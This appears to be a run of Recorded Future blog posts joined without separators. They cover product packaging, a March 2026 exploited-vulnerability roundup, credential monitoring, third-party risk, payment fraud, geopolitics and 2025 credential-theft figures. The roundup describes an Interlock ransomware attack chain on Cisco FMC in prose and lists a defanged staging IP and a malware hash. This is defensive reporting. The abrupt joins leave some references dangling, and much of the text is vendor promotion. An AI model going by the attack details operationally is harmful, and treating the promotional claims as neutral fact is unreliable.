Digital Risk Protection helps detect and disrupt threats that never touch your network but directly damage your business: brand impersonation, domain abuse, credential leaks, and phishing infrastructure across the open, deep, and dark web. With access to active infostealer logs and automated IAM remediation, your team can act on exposures within hours, not weeks.

Third-Party Risk delivers continuous, intelligence-driven monitoring of your vendor ecosystem. Security ratings combined with real-time threat intelligence surface breaches, ransomware activity, and dark web exposure days or weeks before formal vendor notification, giving your security and GRC teams evidence they can act on and defend to stakeholders.

Payment Fraud Intelligence identifies stolen payment cards, compromised checks, scam merchants, and web-skimming activity earlier in the fraud lifecycle, so financial institutions can stop losses before they materialize.

Each solution delivers complete, end-to-end capability for its risk domain. And because all four run on the same Intelligence Graph®, a signal detected in one domain immediately enriches context across the others.

Three Packages That Scale With Your Program

Modern organizations operate across multiple risk domains. We are introducing three packages that reflect that reality, meeting customers where they are and scale as their programs mature.

• Core is the foundation for intelligence-led security. It enables organizations to tackle essential use cases on day one - threat detection and alert triage, vulnerability monitoring, credential exposure detection, domain abuse monitoring, and executive impersonation protection. The package combines capabilities across Cyber Operations and Digital Risk Protection solutions, providing immediate, high-impact coverage.
• Professional is built for organizations ready to mature their program and operationalize intelligence at scale. Building on Core, it introduces deeper insights and automation to extend team capacity - enabling autonomous threat hunting, multi-source correlation, and external asset discovery. The result is broader coverage, faster response, and more leverage for security teams without adding headcount.
• Elite delivers the most comprehensive intelligence coverage available. By unifying Cyber Operations, Digital Risk Protection, and Third-Party Risk, it provides a complete view of risk across infrastructure, brand, and supply chain. With a single pane of glass, Elite operationalizes intelligence across workflows and teams—from CTI to SOC to Risk—driving smarter and faster risk-enabled decision making and response.

Across all packages, customers get full access to the Intelligence Graph®, Recorded Future AI, all compatible integrations, APIs, and Collective Insights. No hidden costs or barriers to connect to your existing security stack.

Built for Everyone Who Needs Intelligence, Not Just Analysts

Intelligence only creates value when the right people can act on it. That's why our platform packages include unlimited users. Every analyst, every engineer, every stakeholder who needs intelligence gets it, with no seat limits and no trade-offs about who gets access.

For smaller teams building early-stage programs, we still offer flexible user-based licensing so you can start where it makes sense and expand as your program matures. Either way, pricing is predictable. You know what you're paying, and you can scale with confidence.

Every package also includes unlimited integrations from Recorded Future’s hundreds of supported applications at no additional cost. Your SIEMs, EDRs, SOAR platforms, and ticketing systems all get equipped with real-time intelligence, so every analyst and engineer working in those tools benefits from enriched context without switching screens. Add Autonomous Threat Operations, and those same integrations become the foundation for autonomous hunting, detection, and prevention across your entire stack. Connected tools become an intelligence-led defense system that acts continuously, with minimal human intervention.

One Intelligence Foundation Across Every Domain

What makes this approach powerful isn't just simpler packaging. All four solutions and all three packages run on the same intelligence foundation: the Intelligence Graph®, correlating over 1.2 million sources and 26 billion entities across cyber, digital, third-party, and fraud domains.

A credential leak detected in Digital Risk Protection immediately informs a Cyber Operations investigation. A vulnerability under active exploitation triggers prioritized patching in your workflow. A third-party vendor breach surfaces before the vendor discloses it. Intelligence flows across your entire risk surface, giving you the correlated, high-confidence context that point solutions can't deliver.

That's what it means to be intelligence-led. Not consuming more data. Connecting signals across domains so you can act earlier, with greater confidence, at machine speed.

The Path Forward

Adversaries in 2026 are faster, more coordinated, and more resourceful than they've ever been. They operate across every attack surface simultaneously, and they're accelerating.

Whether you're a team of three building your first intelligence program or a global enterprise running intelligence-led autonomous operations, there's a clear path. Start with the solution or package that matches your priorities today. Grow into deeper automation and broader coverage as your program matures. And at every step, you're backed by the most comprehensive and independent intelligence platform in the industry.

We built this for the threats you're facing right now, and the ones coming next.

These vulnerabilities affected products from the following vendors: Cisco, Microsoft, Google, ConnectWise, Langflow, Citrix, Aquasecurity, Nginx UI, Qualcomm, F5, Craft CMS, Laravel, Apple, Synacor, Wing FTP Server, n8n, Omnissa, SolarWinds, Ivanti, Hikvision, Rockwell, and Broadcom. This month’s most affected vendors were Microsoft and Apple, together accounting for approximately 32% of the 31 vulnerabilities.

One vulnerability (CVE-2017-7921 affecting Hikvision) is approximately nine years old, reinforcing how attackers continue to exploit long-known weaknesses in environments where patching has lagged. Legacy and unpatched systems remain attractive targets. Defenders should not discount older CVEs; instead, they should prioritize based on observed activity, maintain strong asset visibility, and apply compensating controls where remediation is not possible.

In March, Insikt Group® created Nuclei templates for a high-severity path traversal vulnerability in MindsDB (CVE-2026-27483) and a critical missing authentication vulnerability in Nginx UI (CVE-2026-27944). Additionally, Insikt Group® had already published a Nuclei template for CVE-2025-68613 (n8n) in December, prior to its exploitation this month. We also identified public proof-of-concept (PoC) exploits for 10 of the 31 vulnerabilities.

Quick Reference: March 2026 Vulnerability Table

All 31 vulnerabilities below were actively exploited in March 2026. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.

Table 1: List of vulnerabilities that were actively exploited in March based on Recorded Future data.

Key Trends: March 2026

• Most commonly observed weaknesses: CWE-502 (Deserialization of Untrusted Data) and CWE-94 (Code Injection).
• Two vulnerabilities and one exploit kit (consisting of 23 exploits, 12 of which are currently associated with specific CVEs) were linked to malware campaigns.
  • Interlock Ransomware Group exploited a zero-day in Cisco Secure Firewall Management Center to compromise enterprise networks, deploy custom remote access trojans (RATs), and facilitate ransomware operations.
  • Separately, the DarkSword iOS full-chain exploit enabled Safari-based remote code execution (RCE), sandbox escape, and kernel-level access, leading to deployment of the GHOSTKNIFE, GHOSTSABER, and GHOSTBLADE payloads.
  • The Coruna exploit kit similarly compromised iOS devices to deliver the PlasmaLoader (PLASMAGRID) malware.
• 9 of the 31 vulnerabilities (CVE-2026-3910, CVE-2026-33017, CVE-2025-32432, CVE-2025-54068, CVE-2026-20963, CVE-2025-68613, CVE-2025-26399, CVE-2021-30952, and CVE-2023-41974) allowed attackers to conduct RCE.
  • These 9 vulnerabilities affected Google, Langflow, Craft CMS, Laravel, Microsoft, n8n, SolarWinds, and Apple.

Exploitation Analysis

This section analyzes two of the highest-impact, actively exploited vulnerabilities this month. Where applicable, it also highlights the availability of Nuclei templates created by Insikt Group®. The full list of reports and detection rules from March is available to customers in the Recorded Future Intelligence Operations Platform.

Interlock Ransomware Group Exploits Cisco FMC Zero-Day (CVE-2026-20131)

On March 18, 2026, Amazon Threat Intelligence published an analysis detailing an ongoing Interlock ransomware campaign exploiting CVE-2026-20131. CVE-2026-20131 is a critical vulnerability affecting Cisco’s Secure Firewall Management Center (FMC) software that allows unauthenticated threat actors to execute arbitrary Java code as root on vulnerable devices. Cisco Secure FMC is a centralized management platform that allows administrators to configure, monitor, and control Cisco firewall devices and network security policies across an enterprise environment. According to Amazon Threat Intelligence, Interlock Ransomware Group exploited CVE-2026-20131 as a zero-day vulnerability beginning January 26, 2026, indicating active exploitation prior to its public disclosure and enabling early compromise of enterprise networks.

The Interlock Ransomware Group exploits vulnerable Cisco FMC instances via crafted HTTP requests exploiting CVE-2026-20131 to execute arbitrary Java code as root. After gaining access, the threat actors deploy a malicious ELF binary from a staging server at 37[.]27[.]244[.]222 (Intelligence Card) to support follow-on operations.

They then use custom Java- and JavaScript-based RATs, a memory-resident web shell, and proxy infrastructure to maintain access, enable lateral movement, and evade detection. Post-compromise activity includes reconnaissance, data collection and staging, and the use of legitimate tools such as ConnectWise ScreenConnect, Volatility, and Certify for remote access, credential theft, and privilege escalation.

Insikt Group® obtained a screen locker sample (SHA256: 6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f) shared by Amazon Threat Intelligence from Recorded Future Malware Intelligence. Sandbox analysis detected the sample as benign. Based on sandbox and static code analysis, the sample performs the following actions on a victim’s machine:

• Changes the machine’s desktop wallpaper that displays a pornographic image
• Delays execution using the Sleep API function for evasion
• Detects debuggers using the GetTickCount API function to compare timing

Figure 1: Risk Rules History from Hash Intelligence Card® for 6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f in Recorded Future (Source: Recorded Future)

VIP Credential Monitoring in Recorded Future is built to solve this problem. It continuously monitors for credential exposures tied to your most sensitive individuals across both work and personal accounts, and alerts your team fast enough to act before an account takeover occurs.

The Challenge with Protecting Your Most Targeted People

According to Verizon's 2025 Data Breach Investigations Report, credential abuse was the most prominent initial access vector observed across breaches. Attackers don't need to find a technical vulnerability to get inside your organization. Stolen credentials are widely available across criminal forums and dark web marketplaces, and buying access is often faster and cheaper than building an exploit.

What makes this particularly calculated is how threat actors decide which credentials to buy. Infostealer malware logs don't just capture usernames and passwords — they capture the authorization URLs where those credentials were entered. According to Recorded Future’s 2025 Identity Threat Landscape Report, 7 million credentials were indexed with identifiable authorization URLs, with 63.2% of those having been linked to authentication systems.

Figure 1: Top authorization URL categories, 2025 (Source: Recorded Future)

That means attackers can usually identify the access endpoints credentials unlock and they will prioritize accordingly. Executives and anyone with broad access to systems and data sit at the top of that list.

The 2025 cyber attack on University of Pennsylvania illustrates exactly how this plays out. A threat actor compromised a single employee's SSO credential and used it to move laterally across corporate systems, ultimately exposing data on approximately 1.2 million donors, alumni, and students. One credential, one login, and an organizational crisis.

The threat doesn't stop at corporate accounts. When attackers can't get hold of an executive's work credentials, they target personal accounts for these high-value targets. A personal email or social account can expose sensitive communications, private information, or material an attacker can use for extortion.

Corporate security controls don't extend to personal accounts. When those credentials are stolen, most security teams have no line of sight.

That gap between exposure and discovery is where the risk lives. Credentials stolen by infostealer malware are often purchased and weaponized within 48 hours of the compromise, potentially days or weeks before a security team has any indication something is wrong. For standard employee accounts, that window is serious. For your CEO or Head of Engineering, it's critical.

Monitoring Built for High-Value Targets

VIP Credential Monitoring provides continuous monitoring and alerting on compromised credentials for your high-value targets. Security teams can add personal or work email addresses for their executives and others with widespread access.

From that point forward, Recorded Future continuously monitors for those accounts across its full source coverage: infostealer malware logs from 30+ malware families, dark web forums, criminal marketplaces, paste sites, and breach dumps. When a VIP credential surfaces in that data, the team receives an alert with full contextual detail (malware family, authorization URL, compromised host information, etc.) so they can act with confidence.

Many executive monitoring solutions surface credential data that is days or weeks old by the time it reaches an analyst. By then, the window to get ahead of an attacker has often closed. For all stolen credentials indexed in 2025, Recorded future detected 36.4% within 24 hours of exfiltration, and 52.9% within one week.

The gap between when credentials are stolen and when a security team finds out is where breaches happen. Recorded Future closes that gap.

When a VIP credential appears in exposure data, teams can initiate a password reset, review active sessions, or reach out directly to the individual — all before the credential is exploited. For identities that carry this level of organizational risk, getting ahead of the exposure isn't just operationally valuable; it can be the difference between a resolved alert and a significant incident.

A Complete Picture of Identity Exposure

VIP Credential Monitoring is built on the same intelligence infrastructure that powers Recorded Future Identity Intelligence broadly: the same source coverage, the same detection engine, the same alert and triage workflow. It applies that capability to a category of identities that warrant closer attention, without requiring a separate tool, process, or integration. That's the logic behind Identity Intelligence as a whole: a unified view of credential exposure across every category of identity your organization needs to protect, covering employees, customers, and your highest-risk individuals.

For teams already using Identity Intelligence to monitor employee and customer credentials, VIP Monitoring is a targeted extension of coverage that fits into what they've already built. Any VIP credentials identified will benefit from the same core features of Identity Intelligence.

This includes Incident Reports, which surfaces any other credentials that may have been compromised from the same machine, and Customizable Alerting, which streamlines prioritization of these detections and can trigger response workflows through existing integrations with Okta, Microsoft Entra ID, XSOAR, Splunk, and others.

Attackers don't limit their targets to one type of account, and your monitoring shouldn't either. To see where you stand today, request a free Identity Exposure Assessment Report and get a concrete, evidence-based picture of your organization's credential exposure over the past year. Contact us to learn more about how Recorded Future can help your organization protect its identities and to see a demo of the platform in action.

Today, the average enterprise works with hundreds of third parties. Threat actors actively target the weakest links across those supply chains, not because the vendors themselves are the prize, but because they're the path of least resistance into larger, more valuable targets.

Ransomware groups list vendors on extortion sites before those vendors even know they've been compromised. Stolen employee credentials surface on dark web forums undetected. Critical vulnerabilities are weaponized in hours, not months. In this environment, a security rating is necessary. But it is nowhere near sufficient.

Recognized in the 2026 Forrester Wave™

Recorded Future was recently included in The Forrester Wave™: Cybersecurity Risk Ratings Platforms, Q2 2026. (The report is available online to Forrester customers or for purchase here).

We see this recognition as a reflection of the market's evolution — and as an acknowledgement of the direction we've been building toward.

We believe the cybersecurity risk ratings market is at an inflection point. Analysts and practitioners alike recognize that the category is moving beyond standalone ratings toward integrated intelligence and actionable insights. We see our inclusion in this evaluation as confirmation that the convergence of hygiene data and threat intelligence isn't a niche play — it's where the market is heading. In light of where the ratings market is today, let’s dive into where Recorded Future is going and how Recorded Future envisions the future of securing the third-party ecosystem.

The Gap Between Hygiene and Intelligence

Cyber risk ratings have earned their place in the security stack. They provide a standardized, scalable way to evaluate a vendor's external security posture — patching cadence, encryption practices, DNS configuration, exposed services. That hygiene baseline matters. It's a correlative signal for breach potential, and it gives risk teams a common language for comparing vendors and benchmarking against industry peers.

But hygiene ratings only answer part of the problem: How well is this vendor maintaining their defenses?

They don't tell you whether anyone is actively trying to breach those defenses. They don't surface the dark web chatter on a specific vendor. They don't alert you when a vendor's credentials are leaked or has an active malware infection. This is the gap that has left third-party risk programs perpetually reactive. Teams learn about vendor compromises from news headlines or from the vendors themselves — often days or weeks after the initial breach. By then, the window for proactive response may have closed.

From our own customer conversations, we hear that security and risk teams have shifted from wanting ratings and accuracy alone to demanding intelligence that reveals real cybersecurity risk, with prioritized findings and actionable remediation guidance. Ratings are increasingly commoditized. The differentiation now lies in what you do with the data, and what additional signals you bring to the table.

Third-Party Risk Management Is an Intelligence Operation

If you accept that ratings alone aren't enough, the logical next step is clear: third-party risk management must be treated as an intelligence operation.

That means combining the hygiene baseline — the outside-in view of a vendor's security posture — with real-time threat intelligence that tells you who is being targeted, how, and what you should do about it. It means shifting from periodic assessments to continuous monitoring. It means equipping risk teams with the context to distinguish between a low-priority configuration issue and a vendor whose infrastructure is actively under attack. This is the problem Recorded Future Third-Party Risk was built to solve.

We've brought together two distinct capabilities that, until now, existed in separate worlds.

1. RiskRecon — built over a decade as one of the industry's leading cyber risk ratings platforms, trusted by 21,500+ users across 30+ industries, provides the hygiene foundation: transparent, evidence-backed security ratings evaluated across 40+ criteria in 9 security domains, with 99% audited data accuracy.
2. Recorded Future's threat intelligence capabilities, powered by collection and analysis across more than 1 million sources, adds the threat dimension: real-time alerting on ransomware extortion activity, dark web exposures, credential leaks, and active vulnerability exploitation — often before the affected vendor is even aware.

Together, these capabilities create something the market hasn't had before: a single solution that covers the full lifecycle of third-party risk, from initial assessment and onboarding through continuous monitoring and incident response.

What This Looks Like in Practice

The value of combining hygiene ratings with threat intelligence isn't theoretical. Our customers are already seeing it play out.

• When a vendor appears on a ransomware extortion site, Third-Party Risk customers can receive alerts in hours — not the days or weeks it takes for vendor self-disclosure.
• When credentials associated with a monitored vendor surface on dark web markets, risk teams can initiate outreach and remediation before those credentials are weaponized.
• When a critical vulnerability is disclosed, intelligence context helps analysts determine which vendors are actually exposed and at risk of exploitation, rather than treating every vendor with the affected software as equally urgent.

Customers consistently report a roughly 33% increase in visibility into third-party risks after adopting the platform (UserEvidence). Teams save an average of 7 hours per week that was previously spent on manual research and monitoring (UserEvidence). And customers routinely detect vendor incidents before the vendor itself has disclosed — turning what used to be a reactive scramble into a controlled, proactive response.

These aren't incremental improvements. They represent a fundamental shift from reactive compliance to proactive risk management.

Where We're Going

We're not done. Bringing RiskRecon and Recorded Future together was the first step in a broader vision for what third-party risk management should become.

Our roadmap is focused on deepening the integration between these two platforms into a unified experience. One where hygiene ratings, threat intelligence, and risk workflows operate seamlessly together. We're investing in AI-driven capabilities that will help risk analysts cut through noise faster, automate routine assessment workflows, and surface the insights that matter most. And we're building toward predictive intelligence that doesn't just tell you what's happening now, but helps you anticipate where risk is headed.

The goal is straightforward: make third-party risk management as data-driven, automated, and intelligence-led as the best security operations programs already are.

Join the Shift to Intelligence-Driven Third-Party Risk

Third-party risk programs that rely exclusively on hygiene ratings will continue to be caught off guard. The vendors who score well on a Tuesday can be breached by Wednesday. The questionnaire response you received last quarter may not reflect today's reality.

The organizations that are getting ahead of this are the ones treating third-party risk as what it actually is: an intelligence operation that requires continuous monitoring, real-time alerting, and the context to act decisively when something changes.

That's the future we're building. And we believe we're the only ones building it with the depth of intelligence and the strength of ratings data required to get it right.

Read the Full Video Transcript:

I’m Kyle Kohler. I’m a product manager over the integration strategy at Recorded Future.

Recorded Future is the world’s largest threat intelligence provider. We are covering all sorts of domains of intelligence. It’s geopolitical intelligence, cyber intelligence, payment fraud intelligence. And essentially intelligence is this data that an organization uses to take action and make a better decision. So the more that you understand a subject or topic, a current event, the better that you can define what actions you take to either defend your organization or proactively increase your competitive edge.

As a product manager, it’s funny. I see it as this arson firefighter educator role. And I think that definitely needs to be unpacked a bit. As an arson, you’re starting fires. So, very strategically, which fire do I put under which team, under which initiative, which fire do I stoke and one do I burn hotter? And as a firefighter, you’ve got maybe fires coming in being reported to you from a customer, from an organization, from another product team who needs this other product team to make something happen. And so, you’re very strategically figuring out what to stamp out, what to stoke. And as an educator, you’re also teaching others how to start fires and put out fires. So, you’re constantly going from one thing to the next and keeping all of these moving pieces going. There’s no one project that you just shepherd along and that’s the only thing you work on. You’re constantly context switching and a good product manager has that multi-domain knowledge to think laterally, but also track how this thing affects that thing and how it might affect the other thing in the future.

At Recorded Future, we’re a global organization and I’m based on the west coast of California. So I wake up in the morning and the first thing I’ve got are 10 to 12 Slack messages from across the globe that come in from different geographies. Other people are ending their day and they’ve got some questions that maybe I can answer or they’re looking for how to direct on who might have the right answer. So the first thing generally starts with voraciously checking Slack and I’m answering notifications as I mentioned questions and the next thing is okay well from the answers to those questions are there new initiatives that need to get spun up or are there existing initiatives that need to get nudged along or are there certain fires that need to get stamped out and that’s the whole day is you’re really tracking where things are in their current state what needs to get responded to and what needs to get pushed along.

Recorded Future really was attractive to me because it was a pretty new field within cyber security and within technology but also as a company was not just related to IT and cyber had this geopolitical and payment fraud type of angle looking at the world. So it was really taking a big data problem how do you track everything that happens everywhere but then how do you break that down into these bite-sized pieces that ultimately help an organization’s current mission. So I really was attracted by the fact that we are helping organizations secure the world. We’re able to do that by securing the world with intelligence, but it’s so multi-domain that you’re just never going to get bored. There’s always something new. There’s always something to track. There’s always some new threat. There’s always some new initiative, some new innovation. And Recorded Future has really been at that cutting edge of innovation. Always coming up with what’s next in the market, what’s next in the threat landscape and how will we as a company address supercharging the existing missions of our organizations that we help today.

Original content: https://venturefizz.com/insights/what-i-do-at-recorded-future-senior-product-manager/

It is increasingly sustained by an industrial support ecosystem: purpose-built infrastructure, packaged toolkits, and professionalized services that allow threat actors to maximize fraud output while minimizing the skill and effort required to execute attacks.

According to Recorded Future's Annual Payment Fraud Intelligence Report: 2025, this industrialization was driven by technical advances and increasingly professionalized support services.

The Magecart e-skimmer supply chain is the clearest example. Full-stack e-skimmer kits and Malware-as-a-Service (MaaS) offerings have made large-scale compromise of ecommerce websites accessible to less technically capable threat actors.

The "Sniffer by Fleras" kit, responsible for 26% of all e-skimmer infections observed in 2025, includes a web-based portal for generating malicious scripts and a management server for stolen data. The result was more than 10,500 unique Magecart infections active at some point during the year, likely compromising more than 23 million transactions.

Additionally, the "AcceptCar" e-skimmer, discovered in H2 2025, illustrates how far the service model has matured. Operators handle installation and operation on compromised e-commerce sites; in return, threat actors pay 50% of proceeds from card data sales or 70% of raw data intake. Using services like AcceptCar, fraud threat actors can participate in large-scale compromise operations without owning or managing any underlying infrastructure.

Figure 1: Line graph showing Magecart e-skimmer infections in 2025, by different groups, kits, and techniques. (Source: Recorded Future)

Purchase scam operations reflect a similar dynamic. Recorded Future Payment Fraud Intelligence identified more than 3,600 scam merchant accounts in 2025, up 2.5x from 2024, spanning at least 40 countries and 230 acquirers.

Recurring patterns in merchant registration data indicate that scam operators have standardized their merchant acquisition workflows, standing up fraudulent payment infrastructure at scale through repeatable, low-friction processes.

Card testing operates on the same service-economy logic. Telegram-based card testing services validated at least 27 million card records in 2025 through public-facing card generation and testing channels that any threat actor can access.

Among dark web checker services, over 1,350 legitimate merchant accounts were abused for card testing, with 94% not observed prior to 2025, suggesting systematic rotation to stay ahead of detection.

Figure 2: Graphic illustrating the purchase scam attack chain. (Source: Recorded Future)

The Ecosystem Is Concentrated Upstream

Notably, each of these industrialized attack vectors sits upstream of the fraudulent transaction. E-skimmer infections and scam merchants compromise card data during online purchases. Card testing validates that stolen data before it’s monetized.

"Fraud outcomes are visible, but the pathways that enable them are often not."

This industrialized scale across these attack vectors requires standardization, and standardization produces detectable patterns.

When 26% of e-skimmer infections trace back to a single kit, when scam operators reuse merchant registration patterns across hundreds of acquirers, when card testers rotate through predictable BIN attack workflows, the convergence that makes fraud scalable also makes it mappable. As that standardization deepens, a single indicator of compromise reaches further across the threat landscape.

That standardization creates something concrete: a window.

Magecart infections are active and identifiable before stolen card data is harvested.
Scam merchants often display detectable signals, including recent domain registration, merchant rotation, and merchant category code mismatches.

Card testing activity reveals when a monetization attempt is likely to occur.

Each stage represents an opportunity to act before fraud registers as a financial loss.

Transaction Monitoring Looks at the Wrong End of the Lifecycle

Transaction monitoring and behavioral fraud models are built to detect anomalies at the point of payment, like unusual spend patterns, velocity, and geographic inconsistencies. They do what they were designed to, but provide no visibility into the increasingly industrialized, pre-monetization stages that were built to avoid detection by these traditional processes.

Purchase scams are explicitly designed to circumvent transaction-based controls by manipulating cardholders into authorizing the fraudulent transaction themselves, making the payment appear legitimate by design.

Card testers cycle through new merchants specifically because historical tester merchants get flagged (94% of tester merchants identified in 2025 were not previously observed). A detection approach built around transaction signals will always be working with information that arrives after the upstream infrastructure has already done its job.

As the upstream ecosystem industrializes, the volume of activity that transaction monitoring cannot see has grown. With purchase scam detections more than quadrupling year-over-year and Magecart infections having likely compromised more than 23 million transactions in 2025 alone, the cost of that blind spot compounds.

Maintaining an effective fraud posture will increasingly require financial institutions to complement reactive account monitoring with proactive, intelligence-informed defenses.

How Recorded Future Payment Fraud Intelligence Addresses This

Recorded Future Payment Fraud Intelligence monitors each of the upstream stages discussed in this post.

With daily monitoring of Magecart-infected sites and enriched merchant data that integrates with transaction monitoring, Payment Fraud Intelligence can enable detection of high-risk merchants months before stolen card data appears for sale.

Additionally, the Scam Merchants dataset can identify fraudulent merchant accounts and their associated domains before customers are defrauded and before downstream card data reaches criminal markets.

Tester merchant monitoring surfaces card testing activity as an early signal of which portfolios are being targeted ahead of any monetization attempt.

Because Payment Fraud Intelligence monitors the sources, kits, and infrastructure that threat actors have increasingly standardized around, a single identified indicator can surface exposure across a portfolio at scale.

According to Recorded Future data, 75% of compromised cards are identified before fraud occurs, and 90% of compromised card assets are identified within hours of a breach.

The pre-monetization window will not narrow as the fraud ecosystem matures — if anything, the report's data suggests it will widen as standardization deepens. Financial institutions with visibility into that window can act before losses occur. Those without it will continue to respond after the fact.

Read the full Annual Payment Fraud Intelligence Report: 2025 to explore this year's findings in depth.

What is Quantum Geopolitics?

A useful analogy comes from physics.

Classical systems produce predictable outcomes. Quantum systems behave probabilistically, where interactions in one place can produce distant effects.

International politics increasingly resembles the latter.

The assumptions that shaped corporate strategy for decades—durable alliances, expanding globalization, and broadly coherent regulation—are weakening. Geopolitical shocks now move rapidly through tightly interconnected systems.

Four dynamics define how this system now behaves.

🌓 Superposition: Friends, Rivals, and Everything in Between

Countries can no longer be neatly categorised “ally” or “adversary.” They exist in overlapping states, with true alignment revealed only in moments of crisis.

States balance security partnerships with the West while maintaining economic ties with rivals. Turkey supports Ukraine diplomatically while sustaining trade flows that benefit Russia. India deepens defence ties with the United States even as it increases purchases of Russian oil.

Public statements offer limited guidance. Trade flows, enforcement patterns, and technology controls are more reliable indicators of intent.

For multinational firms, geopolitical positioning is no longer fixed. It is fluid.

🌀 The End of Guarantees: Promises Now Come with Caveats

Security commitments, trade access, and regulatory stability have shifted from certainties to probabilities.

Export controls can reroute supply chains within months. Sanctions regimes expand or unwind quickly. Even long-standing alliances depend on political will at the moment they are tested.

For businesses, this means long-term investments now carry elevated policy risk.

Leaders must plan for variance.

🧬 Quantum Entanglement: Local Conflicts Are Not Local

Global systems—financial, technological, logistical—are tightly coupled. Regional conflicts now generate immediate global effects.

Threats to Gulf commercial hubs disrupt international banking. Instability in the Strait of Hormuz drives energy price volatility and strains global shipping insurance. Cyber campaigns tied to the conflict target companies far beyond the region.

Disruption is rarely contained. Risk can no longer be managed by geography or function alone.

🔬 The Observer Effect: Whoever Sets the Rules First Wins

Influence increasingly derives from shaping rules rather than operating within them.

States that move early to establish standards in artificial intelligence, semiconductors, digital infrastructure, and financial regulation compel others to adapt.

Waiting for clarity can therefore be a strategic liability in itself.
If you do not shape the agenda, you become subject to it.

Why This Moment Feels Different

These dynamics are most visible in cyberspace, where geopolitical competition unfolds continuously below the threshold of open conflict.

State-sponsored actors operate inside corporate networks without triggering overt confrontation. Criminal groups, proxies, and intelligence services overlap, complicating attribution and response.

The boundary between geopolitical conflict and corporate exposure is now thin. A single breach can trigger regulatory scrutiny, customer loss, market volatility, and diplomatic tension at once.

Cybersecurity is no longer a technical function. It is a core enterprise risk.

How Security Leaders Should Respond

In a system governed by probabilities rather than predictability, security leaders must adapt how they think, allocate resources, and position their organizations.

1. Mindset Shift: Scenarios, Not Forecasts

Replace long planning horizons and static risk assessments with continuous scenario planning. Tools such as the Cone of Plausibility can stress-test responses to sanctions escalation, maritime disruption, regulatory fragmentation, or supply chain shocks.

Evaluate decision speed, cross-functional coordination, and response thresholds under pressure.
Adaptability matters more than accuracy.

2. Spending Shift: Invest in Resilience, Not Just Efficiency

Systems optimized solely for efficiency often lack resilience.

Diversifying suppliers, strengthening sanctions compliance, improving cybersecurity, and increasing visibility into third-party exposure can reduce vulnerability to geopolitical shocks.

Resilience is not a defensive expense; it is operational insurance.

3. Communication Shift: From Reporting to Action

Security leaders must translate geopolitical developments into clear decision frameworks before crises materialize.

This requires close coordination across legal, finance, and operations, as well as proactive engagement with regulators and industry partners.

Speed and clarity determine whether the organization shapes outcomes or reacts to them.

Final Thoughts

The Iran conflict offers a preview of what comes next. Alliances are conditional. Economic pressure, cyber activity, and regulatory responses unfold simultaneously.

Quantum geopolitics does not eliminate strategy. It demands a different kind—one built on scenario readiness, structural resilience, and faster decision cycles.

Leaders who wait for clarity will move too late.

Those who organize for uncertainty will operate ahead of it.

To access the latest Insikt Group® research click here.

Insikt Group® helps Recorded Future secure our world with threat intelligence. With deep experience in government, law enforcement, military, and intelligence agencies, we power the Recorded Future Platform with analyst-validated data, analytics, along with cyber and geopolitical intelligence. This enables our customers to reduce risk and prevent disruption.

Credential theft is the dominant initial access vector for enterprise breaches. In 2025, Recorded Future detected:

• 1.95 billion malware combo list credential exposures
• 36 million database combo list credential exposures
• 24 million database dump credential exposures
• 892 million malware log credential exposures

Five findings stand out from the data:

1. Credential theft accelerated as the year progressed. Recorded Future identified 50% more credentials in the second half of 2025 than in the first half of the year. 90% more credentials were identified in the last three months of the year than in the first three months
2. Stolen credentials are targeted, not random. Of the 7 million credentials indexed with identifiable authorization URLs, 63.2% were tied to authentication systems. VPNs, RMM tools, cloud platforms, and detection software also featured prominently — meaning attackers are often going directly for the systems that provide the broadest access and, in some cases, the ability to blind security teams entirely.
3. Infostealer malware is outpacing traditional breach detection. Each compromised device yielded an average of 87 stolen credentials. The scale and precision of modern infostealers means a single infected endpoint — including a personal device used to access corporate systems — can expose an entire organization.
4. MFA alone is no longer sufficient protection. 276 million of the credentials indexed in 2025 included active session cookies, meaning attackers can bypass multi-factor authentication entirely. This represents 31% of all malware-sourced credentials.
5. Detection speed is the decisive advantage. Over half of all credentials (53%) were indexed within one week of exfiltration, and 36.4% within 24 hours. Organizations that act on intelligence quickly can intervene before stolen credentials are exploited.

The Scale of the Problem: Compromised Credentials in 2025

Volume Grew Throughout the Year

Credential compromise from malware logs was not a static risk in 2025 — it compounded. Recorded Future observed a consistent upward trend throughout the year, with the second half producing 50% more indexed credentials than the first.

The final three months of the year were particularly active: They saw 90% more volume than the first three months, reflecting both the continued proliferation of infostealer malware-as-a-service (MaaS) and the disruption and reformation of major malware families mid-year (covered in detail in the malware section below).

CHART 1: Monthly credential volume from malware logs, full year 2025 (Source: Recorded Future)

What this means for security teams: Seasonal or quarterly threat reviews are insufficient. The volume and pace of credential exposure in 2025 demands continuous monitoring — not periodic audits.

What do Those Credentials Actually Unlock?

CHART 2: Top authorization URL categories, 2025 (Source: Recorded Future)

More credentials exposed means more doors open to attackers. The authorization URL data from 2025 reveals exactly which doors they're targeting — and the picture is stark.

Of the 7 million credentials with high-risk authorization URLs indexed in 2025, 63.2% were tied to authentication systems. The next largest categories were web content management (9.95%) and cloud computing (7.58%), followed by remote monitoring and management tools (6.19%) and email infrastructure (3.87%).

This is not a random distribution. Authentication systems, cloud platforms, and remote access tools — VPNs at 2.4% and RMM tools at 6.19% — are precisely the systems that give attackers the broadest foothold inside an organization. A single stolen credential for an authentication portal or VPN can serve as the entry point for lateral movement, privilege escalation, and ultimately a full breach.

The presence of detection and response software (1.17%) and SIEM platforms (0.06%) in this list is particularly notable. Credentials for the tools organizations rely on to detect attacks are themselves being stolen — giving attackers the ability to blind security teams before they strike.

What this means for security teams: The value of a stolen credential is determined by what it unlocks. Prioritize monitoring and rapid response for credentials tied to authentication systems, remote access tools, cloud infrastructure, and security platforms — these can represent the highest-leverage targets for attackers operating with stolen credentials.

A Global Problem With Regional Concentration

Compromised credentials were indexed from organizations across the globe. The ten countries with the highest credential volume in 2025 were:

Table 1: Credentials indexed by country (Source: Recorded Future)

MAP 1: Credentials indexed by country (Source: Recorded Future)

The breadth of this data underscores that credential theft is not concentrated in a single region or industry — it is a universal risk. Organizations with global workforces, multinational supply chains, or international customer bases face exposure across multiple geographies simultaneously.

The Anatomy of a Compromise: What Attackers Actually Steal

87 Credentials Per Device

When an employee's device is infected with infostealer malware, the damage rarely stops at one account. In 2025, the average compromised device yielded 87 stolen credentials — spanning corporate applications, personal accounts, and cloud services accessed from the same machine.

